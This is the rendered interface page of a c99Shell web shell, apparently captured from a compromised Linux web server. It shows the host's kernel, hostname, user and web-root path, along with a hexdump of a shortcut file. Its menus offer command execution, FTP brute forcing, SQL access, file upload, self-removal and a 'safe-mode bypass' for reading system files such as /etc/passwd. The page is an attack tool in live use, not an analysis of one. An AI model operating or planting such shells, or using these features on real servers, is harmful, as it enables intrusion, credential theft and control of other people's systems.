!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/picture/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Shortcut to movedoc.gif.lnk (563 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/picture/Shortcut to movedoc.gif.lnk
Size 563 B
MD5 bbb2dedc71cc39bdebd7ba3671f31288
Owner/Group apache/apache
Perms-rw-r--r--
Create time 03/07/2013 18:31:17
Access time 11/07/2024 13:07:08
MODIFY time 17/10/2007 18:37:40

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 9B 00 00 00
20 00 00 00 4E 9B A2 AE A9 10 C8 01 4E 9B A2 AE A9 10 C8 01 00 EF D2 C8
DD B2 C4 01 27 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 4A 00 48 00 32 00 27 01 00 00 4F 31 CF 8C 20 00 6D 6F 76 65
64 6F 63 2E 67 69 66 00 2E 00 03 00 04 00 EF BE 51 37 A8 54 51 37 A8 54
14 00 00 00 6D 00 6F 00 76 00 65 00 64 00 6F 00 63 00 2E 00 67 00 69 00
66 00 00 00 1A 00 00 00 63 00 00 00 1C 00 00 00 01 00 00 00 1C 00 00 00
2D 00 00 00 00 00 00 00 62 00 00 00 11 00 00 00 03 00 00 00 90 4C 0D E0
10 00 00 00 00 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65
74 74 69 6E 67 73 5C 4C 65 6E 6F 76 61 5C 44 65 73 6B 74 6F 70 5C 6D 6F
76 65 64 6F 63 2E 67 69 66 00 00 40 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C
00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 44 00 6F 00 63
00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53
00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 4C 00 65 00 6E 00 6F
00 76 00 61 00 5C 00 44 00 65 00 73 00 6B 00 74 00 6F 00 70 00 5C 00 6D
00 6F 00 76 00 65 00 64 00 6F 00 63 00 2E 00 67 00 69 00 66 00 28 00 43
00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20
00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73
00 5C 00 4C 00 65 00 6E 00 6F 00 76 00 61 00 5C 00 44 00 65 00 73 00 6B
00 74 00 6F 00 70 00 60 00 00 00 03 00 00 A0 58 00 00 00 00 00 00 00 6A
6F 69 63 65 00 00 00 00 00 00 00 00 00 00 00 4A 9E 3F 80 68 D6 E7 49 AD
B0 50 F4 0F 2A 75 F7 8A 66 70 97 80 7C DC 11 8E 3B 00 1B 38 02 DC 22 4A
9E 3F 80 68 D6 E7 49 AD B0 50 F4 0F 2A 75 F7 8A 66 70 97 80 7C DC 11 8E
3B 00 1B 38 02 DC 22 00 00 00 00
L00000000000000F000
 000NN0
ݲ'00000000000000000
0000J0H020'00O1ό 0move
doc.gif0.000Q7TQ7T
000m0o0v0e0d0o0c0.0g0i0
f000000c000000000000
-0000000b000000000
0000C:\Documents and Se
ttings\Lenova\Desktop\mo
vedoc.gif00@0.0.0\0.0.0\
0.0.0\0.0.0\0.0.0\0D0o0c
0u0m0e0n0t0s0 0a0n0d0 0S
0e0t0t0i0n0g0s0\0L0e0n0o
0v0a0\0D0e0s0k0t0o0p0\0m
0o0v0e0d0o0c0.0g0i0f0(0C
0:0\0D0o0c0u0m0e0n0t0s0 
0a0n0d0 0S0e0t0t0i0n0g0s
0\0L0e0n0o0v0a0\0D0e0s0k
0t0o0p0`00000X0000000j
oice00000000000J?hI
P*ufp|;08"J
?hIP*ufp|
;08"0000

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0094 ]--